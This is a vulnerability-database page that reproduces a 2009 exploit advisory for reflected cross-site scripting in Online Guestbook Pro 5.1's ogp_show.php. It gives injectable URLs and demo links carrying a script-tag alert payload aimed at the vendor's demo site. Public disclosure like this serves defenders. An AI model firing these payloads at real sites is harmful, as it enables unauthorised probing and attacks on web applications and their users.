Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Online Guestbook Pro 5.1 Cross Site Scripting

🗓️ 09 Jul 2009 00:00:00Reported by 599eme ManType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 64 Views

Online Guestbook Pro 5.1 Cross Site Scripting vulnerability in ogp_show.ph

Code
`  
_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_  
_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_  
_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_  
_____0______0______0__0______0___0__0________0___0__00000__0___0_  
_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_  
_________________________________________________________________  
  
  
  
# [+] Online Guestbook Pro 5.1 Multiple Remote Xss Injection  
# [~] Based on : http://packetstorm.linuxsecurity.org/0907-exploits/ogp51-xss.txt  
# [+] Author : 599eme Man  
# [+] Contact : [email protected]  
# [+] Thanks : Moudi, Neocoderz, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker...  
# [+] Dowload : http://www.esoftpro.com/web_scripts_online_guestbook_pro.php  
#  
#[------------------------------------------------------------------------------------]  
#  
#  
# [+] Exploit :  
#  
# http://www.site.com/path/ogp_show.php?display=0&sort=&entry=10&search=%[XSS]  
#  
# http://www.site.com/path/ogp_show.php?display=[XSS]  
#  
#[------------------------------------------------------------------------------------]  
#  
#  
# [+] Demo :  
#  
# http://www.esoftpro.com/demo/OGP/ogp_show.php?display=0&sort=&entry=10&search="'><script>alert('xss')</script>  
#  
# http://www.esoftpro.com/demo/OGP/ogp_show.php?display="'><script>alert('xss')</script>  
#  
#########################################################################################################  
  
  
  
  
_________________________________________________________________  
Vous voulez savoir ce que vous pouvez faire avec le nouveau Windows Live ? Lancez-vous !  
http://www.microsoft.com/windows/windowslive/default.aspx`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Jul 2009 00:00Current
online guestbook procross site scriptingvulnerabilityogp_show.phpmultiple remote xss injectionexploitdemo599eme man[email protected]moudineocoderzsheiry
64